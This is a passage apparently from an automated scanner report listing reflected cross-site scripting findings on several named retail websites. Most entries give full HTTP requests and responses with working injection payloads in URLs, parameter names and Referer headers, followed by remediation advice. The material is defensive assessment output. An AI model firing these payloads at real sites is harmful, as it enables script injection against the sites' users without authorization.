Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.nl_NL?917e8--><script>alert(1)</script>e342d0f2059=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=124938368333,0) Content-Length: 24378 Date: Fri, 30 Sep 2011 12:46:05 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="nl" lang="nl"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?917e8--><script>alert(1)</script>e342d0f2059=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=nl_NL&SiteID=mfe&StyleID=25691300&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.438. http://www.superbiiz.com/detail.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superbiiz.com
Path:
/detail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b68"%3balert(1)//b5200695155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54b68";alert(1)//b5200695155 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the name request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f067f"%3balert(1)//6149eba4ed9 was submitted in the name parameter. This input was echoed as f067f";alert(1)//6149eba4ed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.440. http://www.superbiiz.com/shopcart.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superbiiz.com
Path:
/shopcart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a92"><script>alert(1)</script>2fa6b99892b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b HTTP/1.1 Host: www.superbiiz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Parts ...[SNIP]... <form name=addCoupon method=post action="/shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b" > ...[SNIP]...
3.441. http://www.superbiiz.com/testimonial_list.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superbiiz.com
Path:
/testimonial_list.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea34'><script>alert(1)</script>4bbda3f12e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2 HTTP/1.1 Host: www.superbiiz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Parts ...[SNIP]... <a href='/testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2?&perPage=10&page=2'> ...[SNIP]...
3.442. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.superbiiz.com
Path:
/signin.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f46d'><script>alert(1)</script>f64e888d837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signin.php/4f46d'><script>alert(1)</script>f64e888d837 HTTP/1.1 Host: www.superbiiz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Pa ...[SNIP]... <form action='https://www.superbiiz.com/signin.php/4f46d'><script>alert(1)</script>f64e888d837' name="BillingShipping" method=post > ...[SNIP]...
3.443. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.superbiiz.com
Path:
/signin.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6077b"><script>alert(1)</script>bee7bf45bb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signin.php/6077b"><script>alert(1)</script>bee7bf45bb8 HTTP/1.1 Host: www.superbiiz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dade9"%3balert(1)//2de852d3325 was submitted in the EdpNo parameter. This input was echoed as dade9";alert(1)//2de852d3325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5002b"%3balert(1)//7620857deb7 was submitted in the EdpNo parameter. This input was echoed as 5002b";alert(1)//7620857deb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b5db"%20a%3db%200434cd2b109 was submitted in the PG parameter. This input was echoed as 8b5db" a=b 0434cd2b109 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /secure/orderlogin.asp?PG=8b5db"%20a%3db%200434cd2b109 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <title>Order Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="TigerDirect.com is your complete o ...[SNIP]... <input type="hidden" name="PG" value="8b5db" a=b 0434cd2b109"> ...[SNIP]...
3.447. http://www.toshibadirect.com/td/b2c/accessories.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.toshibadirect.com
Path:
/td/b2c/accessories.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc6c'-alert(1)-'9fb649c5026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/accessories.jsp?5fc6c'-alert(1)-'9fb649c5026=1 HTTP/1.1 Host: www.toshibadirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.448. http://www.toshibadirect.com/td/b2c/afin.to [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.toshibadirect.com
Path:
/td/b2c/afin.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4191'-alert(1)-'de102c2b329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/afin.to?a4191'-alert(1)-'de102c2b329=1 HTTP/1.1 Host: www.toshibadirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.449. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.toshibadirect.com
Path:
/td/b2c/laptops.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b25'-alert(1)-'f930d532d1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/laptops.to?page=segHHO&68b25'-alert(1)-'f930d532d1c=1 HTTP/1.1 Host: www.toshibadirect.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5166d'-alert(1)-'e8d9a0223a3 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/laptops.to?page=segHHO5166d'-alert(1)-'e8d9a0223a3 HTTP/1.1 Host: www.toshibadirect.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.451. http://www.toshibadirect.com/td/b2c/tv.to [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.toshibadirect.com
Path:
/td/b2c/tv.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b97c9'-alert(1)-'1f957b44ff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/tv.to?b97c9'-alert(1)-'1f957b44ff5=1 HTTP/1.1 Host: www.toshibadirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the div request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0a5'%3balert(1)//043c6cbeb43 was submitted in the div parameter. This input was echoed as da0a5';alert(1)//043c6cbeb43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420&c=1&a=0&div=tmDiv_8f1da0a5'%3balert(1)//043c6cbeb43 HTTP/1.1 Host: www.trustmarker.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.jaybrokers.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357b1'%3balert(1)//c1123920b23 was submitted in the k parameter. This input was echoed as 357b1';alert(1)//c1123920b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420357b1'%3balert(1)//c1123920b23&c=1&a=0&div=tmDiv_8f1 HTTP/1.1 Host: www.trustmarker.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.jaybrokers.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the k request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd5b"%3balert(1)//44dcd2c2f6b was submitted in the k parameter. This input was echoed as abd5b";alert(1)//44dcd2c2f6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b"%3balert(1)//44dcd2c2f6b&c=1&a=0&div=tmDiv_8f1 HTTP/1.1 Host: www.trustmarker.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.jaybrokers.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tmIboxPath;function tmLoadIboxLib_860eb09f390446b3448b172af9efb00e(){tmIboxPath="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b";alert(1)//44dcd2c2f6b&r="+escape(location.href);var tmIboxScript=document.createElement("script");tmIboxScript.setAttribute("src","http://www.trustmarker.com/scripts/ibox.js");tmIboxScript.setAttribute("type","text/javascr ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453a4"><script>alert(1)</script>fbcbb11962f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into an HTML comment. The payload 886f4--><script>alert(1)</script>98026709b0b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 2a067<script>alert(1)</script>fd0070ec4fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.abesofmaine.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=2a067<script>alert(1)</script>fd0070ec4fa
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1df85<script>alert(1)</script>77b71b79bed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 34631<script>alert(1)</script>53c335fa723 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /accountMenu.do HTTP/1.1 Host: www.abesofmaine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=34631<script>alert(1)</script>53c335fa723
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980a6"><script>alert(1)</script>dc697fbf2db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.acehardware.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?hl=en&q=980a6"><script>alert(1)</script>dc697fbf2db Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:04:12 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 110243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff80"><script>alert(1)</script>0470a887578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1 Host: www.acehardware.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?hl=en&q=6ff80"><script>alert(1)</script>0470a887578 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:04:14 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 110243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68105"><script>alert(1)</script>fb9faf167fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:08:12 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 110213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 424af"><script>alert(1)</script>485c49130d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:08:06 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 110213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3955f"><script>alert(1)</script>7aa3a316c02 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /acerewards/index.jsp HTTP/1.1 Host: www.acehardware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3955f"><script>alert(1)</script>7aa3a316c02
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:50:40 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a28b"><script>alert(1)</script>7c72546d38e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
